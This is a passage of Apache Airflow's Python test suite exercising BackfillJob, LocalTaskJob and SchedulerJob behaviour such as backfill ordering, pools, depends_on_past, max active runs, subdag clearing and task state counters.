start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.FAILED)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=False
)
with self.assertRaises(AirflowException):
job.run()
def test_backfill_ordered_concurrent_execute(self):
dag = DAG(
dag_id='test_backfill_ordered_concurrent_execute',
start_date=DEFAULT_DATE,
schedule_interval="@daily")
with dag:
op1 = DummyOperator(task_id='leave1')
op2 = DummyOperator(task_id='leave2')
op3 = DummyOperator(task_id='upstream_level_1')
op4 = DummyOperator(task_id='upstream_level_2')
op5 = DummyOperator(task_id='upstream_level_3')
# order randomly
op2.set_downstream(op3)
op1.set_downstream(op3)
op4.set_downstream(op5)
op3.set_downstream(op4)
dag.clear()
executor = TestExecutor()
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
d0 = DEFAULT_DATE
d1 = d0 + datetime.timedelta(days=1)
d2 = d1 + datetime.timedelta(days=1)
# test executor history keeps a list
history = executor.history
self.maxDiff = None
self.assertListEqual(
# key[0] is dag id, key[3] is try_number, we don't care about either of those here
[sorted([item[-1].key[1:3] for item in batch]) for batch in history],
[
[
('leave1', d0),
('leave1', d1),
('leave1', d2),
('leave2', d0),
('leave2', d1),
('leave2', d2)
],
[('upstream_level_1', d0), ('upstream_level_1', d1), ('upstream_level_1', d2)],
[('upstream_level_2', d0), ('upstream_level_2', d1), ('upstream_level_2', d2)],
[('upstream_level_3', d0), ('upstream_level_3', d1), ('upstream_level_3', d2)],
]
)
def test_backfill_pooled_tasks(self):
"""
Test that queued tasks are executed by BackfillJob
"""
session = settings.Session()
pool = Pool(pool='test_backfill_pooled_task_pool', slots=1)
session.add(pool)
session.commit()
dag = self.dagbag.get_dag('test_backfill_pooled_task_dag')
dag.clear()
job = BackfillJob(
dag=dag,
executor=TestExecutor(),
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE)
# run with timeout because this creates an infinite loop if not
# caught
with timeout(seconds=30):
job.run()
ti = TI(
task=dag.get_task('test_backfill_pooled_task'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
self.assertEqual(ti.state, State.SUCCESS)
def test_backfill_depends_on_past(self):
"""
Test that backfill respects ignore_depends_on_past
"""
dag = self.dagbag.get_dag('test_depends_on_past')
dag.clear()
run_date = DEFAULT_DATE + datetime.timedelta(days=5)
# backfill should deadlock
self.assertRaisesRegexp(
AirflowException,
'BackfillJob is deadlocked',
BackfillJob(dag=dag, start_date=run_date, end_date=run_date).run)
BackfillJob(
dag=dag,
start_date=run_date,
end_date=run_date,
executor=TestExecutor(),
ignore_first_depends_on_past=True).run()
# ti should have succeeded
ti = TI(dag.tasks[0], run_date)
ti.refresh_from_db()
self.assertEqual(ti.state, State.SUCCESS)
def test_run_ignores_all_dependencies(self):
"""
Test that run respects ignore_all_dependencies
"""
dag_id = 'test_run_ignores_all_dependencies'
dag = self.dagbag.get_dag('test_run_ignores_all_dependencies')
dag.clear()
task0_id = 'test_run_dependent_task'
args0 = ['run',
'-A',
dag_id,
task0_id,
DEFAULT_DATE.isoformat()]
cli.run(self.parser.parse_args(args0))
ti_dependent0 = TI(
task=dag.get_task(task0_id),
execution_date=DEFAULT_DATE)
ti_dependent0.refresh_from_db()
self.assertEqual(ti_dependent0.state, State.FAILED)
task1_id = 'test_run_dependency_task'
args1 = ['run',
'-A',
dag_id,
task1_id,
(DEFAULT_DATE + datetime.timedelta(days=1)).isoformat()]
cli.run(self.parser.parse_args(args1))
ti_dependency = TI(
task=dag.get_task(task1_id),
execution_date=DEFAULT_DATE + datetime.timedelta(days=1))
ti_dependency.refresh_from_db()
self.assertEqual(ti_dependency.state, State.FAILED)
task2_id = 'test_run_dependent_task'
args2 = ['run',
'-A',
dag_id,
task2_id,
(DEFAULT_DATE + datetime.timedelta(days=1)).isoformat()]
cli.run(self.parser.parse_args(args2))
ti_dependent = TI(
task=dag.get_task(task2_id),
execution_date=DEFAULT_DATE + datetime.timedelta(days=1))
ti_dependent.refresh_from_db()
self.assertEqual(ti_dependent.state, State.SUCCESS)
def test_backfill_depends_on_past_backwards(self):
"""
Test that CLI respects -B argument and raises on interaction with depends_on_past
"""
dag_id = 'test_depends_on_past'
start_date = DEFAULT_DATE + datetime.timedelta(days=1)
end_date = start_date + datetime.timedelta(days=1)
kwargs = dict(
start_date=start_date,
end_date=end_date,
)
dag = self.dagbag.get_dag(dag_id)
dag.clear()
executor = TestExecutor()
job = BackfillJob(dag=dag,
executor=executor,
ignore_first_depends_on_past=True,
**kwargs)
job.run()
ti = TI(dag.get_task('test_dop_task'), end_date)
ti.refresh_from_db()
# runs fine forwards
self.assertEqual(ti.state, State.SUCCESS)
# raises backwards
expected_msg = 'You cannot backfill backwards because one or more tasks depend_on_past: {}'.format(
'test_dop_task')
with self.assertRaisesRegexp(AirflowException, expected_msg):
executor = TestExecutor()
job = BackfillJob(dag=dag,
executor=executor,
run_backwards=True,
**kwargs)
job.run()
def test_cli_receives_delay_arg(self):
"""
Tests that the --delay argument is passed correctly to the BackfillJob
"""
dag_id = 'example_bash_operator'
run_date = DEFAULT_DATE
args = [
'backfill',
dag_id,
'-s',
run_date.isoformat(),
'--delay_on_limit',
'0.5',
]
parsed_args = self.parser.parse_args(args)
self.assertEqual(0.5, parsed_args.delay_on_limit)
def _get_dag_test_max_active_limits(self, dag_id, max_active_runs=1):
dag = DAG(
dag_id=dag_id,
start_date=DEFAULT_DATE,
schedule_interval="@hourly",
max_active_runs=max_active_runs
)
with dag:
op1 = DummyOperator(task_id='leave1')
op2 = DummyOperator(task_id='leave2')
op3 = DummyOperator(task_id='upstream_level_1')
op4 = DummyOperator(task_id='upstream_level_2')
op1 >> op2 >> op3
op4 >> op3
dag.clear()
return dag
def test_backfill_max_limit_check_within_limit(self):
dag = self._get_dag_test_max_active_limits(
'test_backfill_max_limit_check_within_limit',
max_active_runs=16)
start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
end_date = DEFAULT_DATE
executor = TestExecutor()
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
dagruns = DagRun.find(dag_id=dag.dag_id)
self.assertEqual(2, len(dagruns))
self.assertTrue(all([run.state == State.SUCCESS for run in dagruns]))
def test_backfill_max_limit_check(self):
dag_id = 'test_backfill_max_limit_check'
run_id = 'test_dagrun'
start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
end_date = DEFAULT_DATE
dag_run_created_cond = threading.Condition()
def run_backfill(cond):
cond.acquire()
try:
dag = self._get_dag_test_max_active_limits(dag_id)
# this session object is different than the one in the main thread
thread_session = settings.Session()
# Existing dagrun that is not within the backfill range
dag.create_dagrun(
run_id=run_id,
state=State.RUNNING,
execution_date=DEFAULT_DATE + datetime.timedelta(hours=1),
start_date=DEFAULT_DATE,
)
thread_session.commit()
cond.notify()
finally:
cond.release()
executor = TestExecutor()
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
thread_session.close()
backfill_job_thread = threading.Thread(target=run_backfill,
name="run_backfill",
args=(dag_run_created_cond,))
dag_run_created_cond.acquire()
session = settings.Session()
backfill_job_thread.start()
try:
# at this point backfill can't run since the max_active_runs has been
# reached, so it is waiting
dag_run_created_cond.wait(timeout=1.5)
dagruns = DagRun.find(dag_id=dag_id)
dr = dagruns[0]
self.assertEqual(1, len(dagruns))
self.assertEqual(dr.run_id, run_id)
# allow the backfill to execute by setting the existing dag run to SUCCESS,
# backfill will execute dag runs 1 by 1
dr.set_state(State.SUCCESS)
session.merge(dr)
session.commit()
session.close()
backfill_job_thread.join()
dagruns = DagRun.find(dag_id=dag_id)
self.assertEqual(3, len(dagruns)) # 2 from backfill + 1 existing
self.assertEqual(dagruns[-1].run_id, dr.run_id)
finally:
dag_run_created_cond.release()
def test_backfill_max_limit_check_no_count_existing(self):
dag = self._get_dag_test_max_active_limits(
'test_backfill_max_limit_check_no_count_existing')
start_date = DEFAULT_DATE
end_date = DEFAULT_DATE
# Existing dagrun that is within the backfill range
dag.create_dagrun(run_id="test_existing_backfill",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
executor = TestExecutor()
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
# BackfillJob will run since the existing DagRun does not count for the max
# active limit since it's within the backfill date range.
dagruns = DagRun.find(dag_id=dag.dag_id)
# will only be able to run 1 (the existing one) since there's just
# one dag run slot left given the max_active_runs limit
self.assertEqual(1, len(dagruns))
self.assertEqual(State.SUCCESS, dagruns[0].state)
def test_backfill_max_limit_check_complete_loop(self):
dag = self._get_dag_test_max_active_limits(
'test_backfill_max_limit_check_complete_loop')
start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
end_date = DEFAULT_DATE
# Given the max limit to be 1 in active dag runs, we need to run the
# backfill job 3 times
success_expected = 2
executor = TestExecutor()
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
success_dagruns = len(DagRun.find(dag_id=dag.dag_id, state=State.SUCCESS))
running_dagruns = len(DagRun.find(dag_id=dag.dag_id, state=State.RUNNING))
self.assertEqual(success_expected, success_dagruns)
self.assertEqual(0, running_dagruns) # no dag_runs in running state are left
def test_sub_set_subdag(self):
dag = DAG(
'test_sub_set_subdag',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='leave1')
op2 = DummyOperator(task_id='leave2')
op3 = DummyOperator(task_id='upstream_level_1')
op4 = DummyOperator(task_id='upstream_level_2')
op5 = DummyOperator(task_id='upstream_level_3')
# order randomly
op2.set_downstream(op3)
op1.set_downstream(op3)
op4.set_downstream(op5)
op3.set_downstream(op4)
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
executor = TestExecutor()
sub_dag = dag.sub_dag(task_regex="leave*",
include_downstream=False,
include_upstream=False)
job = BackfillJob(dag=sub_dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
executor=executor)
job.run()
self.assertRaises(sqlalchemy.orm.exc.NoResultFound, dr.refresh_from_db)
# the run_id should have changed, so a refresh won't work
drs = DagRun.find(dag_id=dag.dag_id, execution_date=DEFAULT_DATE)
dr = drs[0]
self.assertEqual(BackfillJob.ID_FORMAT_PREFIX.format(DEFAULT_DATE.isoformat()),
dr.run_id)
for ti in dr.get_task_instances():
if ti.task_id == 'leave1' or ti.task_id == 'leave2':
self.assertEqual(State.SUCCESS, ti.state)
else:
self.assertEqual(State.NONE, ti.state)
def test_backfill_fill_blanks(self):
dag = DAG(
'test_backfill_fill_blanks',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'},
)
with dag:
op1 = DummyOperator(task_id='op1')
op2 = DummyOperator(task_id='op2')
op3 = DummyOperator(task_id='op3')
op4 = DummyOperator(task_id='op4')
op5 = DummyOperator(task_id='op5')
op6 = DummyOperator(task_id='op6')
dag.clear()
dr = dag.create_dagrun(run_id='test',
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
executor = TestExecutor()
session = settings.Session()
tis = dr.get_task_instances()
for ti in tis:
if ti.task_id == op1.task_id:
ti.state = State.UP_FOR_RETRY
ti.end_date = DEFAULT_DATE
elif ti.task_id == op2.task_id:
ti.state = State.FAILED
elif ti.task_id == op3.task_id:
ti.state = State.SKIPPED
elif ti.task_id == op4.task_id:
ti.state = State.SCHEDULED
elif ti.task_id == op5.task_id:
ti.state = State.UPSTREAM_FAILED
# op6 = None
session.merge(ti)
session.commit()
session.close()
job = BackfillJob(dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
executor=executor)
self.assertRaisesRegexp(
AirflowException,
'Some task instances failed',
job.run)
self.assertRaises(sqlalchemy.orm.exc.NoResultFound, dr.refresh_from_db)
# the run_id should have changed, so a refresh won't work
drs = DagRun.find(dag_id=dag.dag_id, execution_date=DEFAULT_DATE)
dr = drs[0]
self.assertEqual(dr.state, State.FAILED)
tis = dr.get_task_instances()
for ti in tis:
if ti.task_id in (op1.task_id, op4.task_id, op6.task_id):
self.assertEqual(ti.state, State.SUCCESS)
elif ti.task_id == op2.task_id:
self.assertEqual(ti.state, State.FAILED)
elif ti.task_id == op3.task_id:
self.assertEqual(ti.state, State.SKIPPED)
elif ti.task_id == op5.task_id:
self.assertEqual(ti.state, State.UPSTREAM_FAILED)
def test_backfill_execute_subdag(self):
dag = self.dagbag.get_dag('example_subdag_operator')
subdag_op_task = dag.get_task('section-1')
subdag = subdag_op_task.subdag
subdag.schedule_interval = '@daily'
start_date = timezone.utcnow()
executor = TestExecutor()
job = BackfillJob(dag=subdag,
start_date=start_date,
end_date=start_date,
executor=executor,
donot_pickle=True)
job.run()
history = executor.history
subdag_history = history[0]
# check that all 5 task instances of the subdag 'section-1' were executed
self.assertEqual(5, len(subdag_history))
for sdh in subdag_history:
ti = sdh[3]
self.assertIn('section-1-task-', ti.task_id)
subdag.clear()
dag.clear()
def test_subdag_clear_parentdag_downstream_clear(self):
dag = self.dagbag.get_dag('example_subdag_operator')
subdag_op_task = dag.get_task('section-1')
subdag = subdag_op_task.subdag
subdag.schedule_interval = '@daily'
executor = TestExecutor()
job = BackfillJob(dag=subdag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
executor=executor,
donot_pickle=True)
with timeout(seconds=30):
job.run()
ti0 = TI(
task=subdag.get_task('section-1-task-1'),
execution_date=DEFAULT_DATE)
ti0.refresh_from_db()
self.assertEqual(ti0.state, State.SUCCESS)
sdag = subdag.sub_dag(
task_regex='section-1-task-1',
include_downstream=True,
include_upstream=False)
sdag.clear(
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
include_parentdag=True)
ti0.refresh_from_db()
self.assertEqual(State.NONE, ti0.state)
ti1 = TI(
task=dag.get_task('some-other-task'),
execution_date=DEFAULT_DATE)
self.assertEqual(State.NONE, ti1.state)
# Checks that all the Downstream tasks for Parent DAG
# have been cleared
for task in subdag_op_task.downstream_list:
ti = TI(
task=dag.get_task(task.task_id),
execution_date=DEFAULT_DATE
)
self.assertEqual(State.NONE, ti.state)
subdag.clear()
dag.clear()
def test_backfill_execute_subdag_with_removed_task(self):
"""
Ensure that subdag operators execute properly in the case where
an associated task of the subdag has been removed from the dag
definition, but has instances in the database from previous runs.
"""
dag = self.dagbag.get_dag('example_subdag_operator')
subdag = dag.get_task('section-1').subdag
executor = TestExecutor()
job = BackfillJob(dag=subdag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
executor=executor,
donot_pickle=True)
removed_task_ti = TI(
task=DummyOperator(task_id='removed_task'),
execution_date=DEFAULT_DATE,
state=State.REMOVED)
removed_task_ti.dag_id = subdag.dag_id
session = settings.Session()
session.merge(removed_task_ti)
with timeout(seconds=30):
job.run()
for task in subdag.tasks:
instance = session.query(TI).filter(
TI.dag_id == subdag.dag_id,
TI.task_id == task.task_id,
TI.execution_date == DEFAULT_DATE).first()
self.assertIsNotNone(instance)
self.assertEqual(instance.state, State.SUCCESS)
removed_task_ti.refresh_from_db()
self.assertEqual(removed_task_ti.state, State.REMOVED)
subdag.clear()
dag.clear()
def test_update_counters(self):
dag = DAG(
dag_id='test_manage_executor_state',
start_date=DEFAULT_DATE)
task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
job = BackfillJob(dag=dag)
session = settings.Session()
dr = dag.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = TI(task1, dr.execution_date)
ti.refresh_from_db()
ti_status = BackfillJob._DagRunTaskStatus()
# test for success
ti.set_state(State.SUCCESS, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 1)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 0)
ti_status.succeeded.clear()
# test for skipped
ti.set_state(State.SKIPPED, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 1)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 0)
ti_status.skipped.clear()
# test for failed
ti.set_state(State.FAILED, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 1)
self.assertTrue(len(ti_status.to_run) == 0)
ti_status.failed.clear()
# test for retry
ti.set_state(State.UP_FOR_RETRY, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 1)
ti_status.to_run.clear()
# test for reschedule
ti.set_state(State.UP_FOR_RESCHEDULE, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 1)
ti_status.to_run.clear()
# test for none
ti.set_state(State.NONE, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 1)
ti_status.to_run.clear()
session.close()
def test_dag_get_run_dates(self):
def get_test_dag_for_backfill(schedule_interval=None):
dag = DAG(
dag_id='test_get_dates',
start_date=DEFAULT_DATE,
schedule_interval=schedule_interval)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow',
)
return dag
test_dag = get_test_dag_for_backfill()
self.assertEqual([DEFAULT_DATE], test_dag.get_run_dates(
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE))
test_dag = get_test_dag_for_backfill(schedule_interval="@hourly")
self.assertEqual([DEFAULT_DATE - datetime.timedelta(hours=3),
DEFAULT_DATE - datetime.timedelta(hours=2),
DEFAULT_DATE - datetime.timedelta(hours=1),
DEFAULT_DATE],
test_dag.get_run_dates(
start_date=DEFAULT_DATE - datetime.timedelta(hours=3),
end_date=DEFAULT_DATE,))
def test_backfill_run_backwards(self):
dag = self.dagbag.get_dag("test_start_date_scheduling")
dag.clear()
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=1),
run_backwards=True
)
job.run()
session = settings.Session()
tis = session.query(TI).filter(
TI.dag_id == 'test_start_date_scheduling' and TI.task_id == 'dummy'
).order_by(TI.execution_date).all()
queued_times = [ti.queued_dttm for ti in tis]
self.assertTrue(queued_times == sorted(queued_times, reverse=True))
self.assertTrue(all([ti.state == State.SUCCESS for ti in tis]))
dag.clear()
session.close()
class LocalTaskJobTest(unittest.TestCase):
def setUp(self):
clear_db_runs()
def test_localtaskjob_essential_attr(self):
"""
Check whether essential attributes
of LocalTaskJob can be assigned with
proper values without intervention
"""
dag = DAG(
'test_localtaskjob_essential_attr',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
ti = dr.get_task_instance(task_id=op1.task_id)
job1 = LocalTaskJob(task_instance=ti,
ignore_ti_state=True,
executor=SequentialExecutor())
essential_attr = ["dag_id", "job_type", "start_date", "hostname"]
check_result_1 = [hasattr(job1, attr) for attr in essential_attr]
self.assertTrue(all(check_result_1))
check_result_2 = [getattr(job1, attr) is not None for attr in essential_attr]
self.assertTrue(all(check_result_2))
@patch('os.getpid')
def test_localtaskjob_heartbeat(self, mock_pid):
session = settings.Session()
dag = DAG(
'test_localtaskjob_heartbeat',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
ti.state = State.RUNNING
ti.hostname = "blablabla"
session.commit()
job1 = LocalTaskJob(task_instance=ti,
ignore_ti_state=True,
executor=SequentialExecutor())
self.assertRaises(AirflowException, job1.heartbeat_callback)
mock_pid.return_value = 1
ti.state = State.RUNNING
ti.hostname = get_hostname()
ti.pid = 1
session.merge(ti)
session.commit()
ret = job1.heartbeat_callback()
self.assertEqual(ret, None)
mock_pid.return_value = 2
self.assertRaises(AirflowException, job1.heartbeat_callback)
@unittest.skipIf('mysql' in configuration.conf.get('core', 'sql_alchemy_conn'),
"flaky when run on mysql")
@unittest.skipIf('postgresql' in configuration.conf.get('core', 'sql_alchemy_conn'),
'flaky when run on postgresql')
def test_mark_success_no_kill(self):
"""
Test that ensures that mark_success in the UI doesn't cause
the task to fail, and that the task exits
"""
dagbag = models.DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag = dagbag.dags.get('test_mark_success')
task = dag.get_task('task1')
session = settings.Session()
dag.clear()
dag.create_dagrun(run_id="test",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = TI(task=task, execution_date=DEFAULT_DATE)
ti.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True)
process = multiprocessing.Process(target=job1.run)
process.start()
ti.refresh_from_db()
for i in range(0, 50):
if ti.state == State.RUNNING:
break
time.sleep(0.1)
ti.refresh_from_db()
self.assertEqual(State.RUNNING, ti.state)
ti.state = State.SUCCESS
session.merge(ti)
session.commit()
process.join(timeout=10)
self.assertFalse(process.is_alive())
ti.refresh_from_db()
self.assertEqual(State.SUCCESS, ti.state)
def test_localtaskjob_double_trigger(self):
dagbag = models.DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag = dagbag.dags.get('test_localtaskjob_double_trigger')
task = dag.get_task('test_localtaskjob_double_trigger_task')
session = settings.Session()
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=task.task_id, session=session)
ti.state = State.RUNNING
ti.hostname = get_hostname()
ti.pid = 1
session.commit()
ti_run = TI(task=task, execution_date=DEFAULT_DATE)
job1 = LocalTaskJob(task_instance=ti_run,
ignore_ti_state=True,
executor=SequentialExecutor())
with patch.object(BaseTaskRunner, 'start', return_value=None) as mock_method:
job1.run()
mock_method.assert_not_called()
ti = dr.get_task_instance(task_id=task.task_id, session=session)
self.assertEqual(ti.pid, 1)
self.assertEqual(ti.state, State.RUNNING)
session.close()
class SchedulerJobTest(unittest.TestCase):
def setUp(self):
clear_db_runs()
clear_db_pools()
clear_db_dags()
clear_db_sla_miss()
clear_db_errors()
# Speed up some tests by not running the tasks, just look at what we
# enqueue!
self.null_exec = TestExecutor()
@classmethod
def setUpClass(cls):
cls.dagbag = DagBag()
def getboolean(section, key):
if section.lower() == 'core' and key.lower() == 'load_examples':
return False
else:
return configuration.conf.getboolean(section, key)
cls.patcher = mock.patch('airflow.jobs.conf.getboolean')
mock_getboolean = cls.patcher.start()
mock_getboolean.side_effect = getboolean
@classmethod
def tearDownClass(cls):
cls.patcher.stop()
def run_single_scheduler_loop_with_no_dags(self, dags_folder):
"""
Utility function that runs a single scheduler loop without actually
changing/scheduling any dags. This is useful to simulate the other side effects of
running a scheduler loop, e.g. to see what parse errors there are in the
dags_folder.
:param dags_folder: the directory to traverse
:type directory: str
"""
scheduler = SchedulerJob(
executor=self.null_exec,
dag_id='this_dag_doesnt_exist', # We don't want to actually run anything
num_runs=1,
subdir=os.path.join(dags_folder))
scheduler.heartrate = 0
scheduler.run()
def _make_simple_dag_bag(self, dags):
return SimpleDagBag([SimpleDag(dag) for dag in dags])
def test_no_orphan_process_will_be_left(self):
empty_dir = mkdtemp()
current_process = psutil.Process()
old_children = current_process.children(recursive=True)
scheduler = SchedulerJob(subdir=empty_dir,
num_runs=1,
executor=TestExecutor(do_update=False))
scheduler.run()
shutil.rmtree(empty_dir)
scheduler.executor.terminate()
# Remove potential noise created by previous tests.
current_children = set(current_process.children(recursive=True)) - set(
old_children)
self.assertFalse(current_children)
def test_process_executor_events(self):
dag_id = "test_process_executor_events"
dag_id2 = "test_process_executor_events_2"
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
dag2 = DAG(dag_id=dag_id2, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
DummyOperator(dag=dag2, task_id=task_id_1)
dagbag1 = self._make_simple_dag_bag([dag])
dagbag2 = self._make_simple_dag_bag([dag2])
scheduler = SchedulerJob()
session = settings.Session()
ti1 = TI(task1, DEFAULT_DATE)
ti1.state = State.QUEUED
session.merge(ti1)
session.commit()
executor = TestExecutor(do_update=False)
executor.event_buffer[ti1.key] = State.FAILED
scheduler.executor = executor
# dag bag does not contain dag_id
scheduler._process_executor_events(simple_dag_bag=dagbag2)
ti1.refresh_from_db()
self.assertEqual(ti1.state, State.QUEUED)
# dag bag does contain dag_id
scheduler._process_executor_events(simple_dag_bag=dagbag1)
ti1.refresh_from_db()
self.assertEqual(ti1.state, State.FAILED)
ti1.state = State.SUCCESS
session.merge(ti1)
session.commit()
executor.event_buffer[ti1.key] = State.SUCCESS
scheduler._process_executor_events(simple_dag_bag=dagbag1)
ti1.refresh_from_db()
self.assertEqual(ti1.state, State.SUCCESS)
def test_execute_task_instances_is_paused_wont_execute(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances_is_paused_wont_execute'
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, DEFAULT_DATE)
ti1.state = State.SCHEDULED
dr1.state = State.RUNNING
dagmodel = models.DagModel()
dagmodel.dag_id = dag_id
dagmodel.is_paused = True
session.merge(ti1)
session.merge(dr1)
session.add(dagmodel)
session.commit()
scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
ti1.refresh_from_db()
self.assertEqual(State.SCHEDULED, ti1.state)
def test_execute_task_instances_no_dagrun_task_will_execute(self):
"""
Tests that tasks without dagrun still get executed.
"""
dag_id = 'SchedulerJobTest.test_execute_task_instances_no_dagrun_task_will_execute'
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
scheduler.create_dag_run(dag)
ti1 = TI(task1, DEFAULT_DATE)
ti1.state = State.SCHEDULED
ti1.execution_date = ti1.execution_date + datetime.timedelta(days=1)
session.merge(ti1)
session.commit()
scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
ti1.refresh_from_db()
self.assertEqual(State.QUEUED, ti1.state)
def test_execute_task_instances_backfill_tasks_wont_execute(self):
"""
Tests that backfill tasks won't get executed.
"""
dag_id = 'SchedulerJobTest.test_execute_task_instances_backfill_tasks_wont_execute'
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr1.run_id = BackfillJob.ID_PREFIX + '_blah'
ti1 = TI(task1, dr1.execution_date)
ti1.refresh_from_db()
ti1.state = State.SCHEDULED
session.merge(ti1)
session.merge(dr1)
session.commit()
self.assertTrue(dr1.is_backfill)
scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
ti1.refresh_from_db()
self.assertEqual(State.SCHEDULED, ti1.state)
def test_find_executable_task_instances_backfill_nodagrun(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_backfill_nodagrun'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr2.run_id = BackfillJob.ID_PREFIX + 'asdf'
ti_no_dagrun = TI(task1, DEFAULT_DATE - datetime.timedelta(days=1))
ti_backfill = TI(task1, dr2.execution_date)
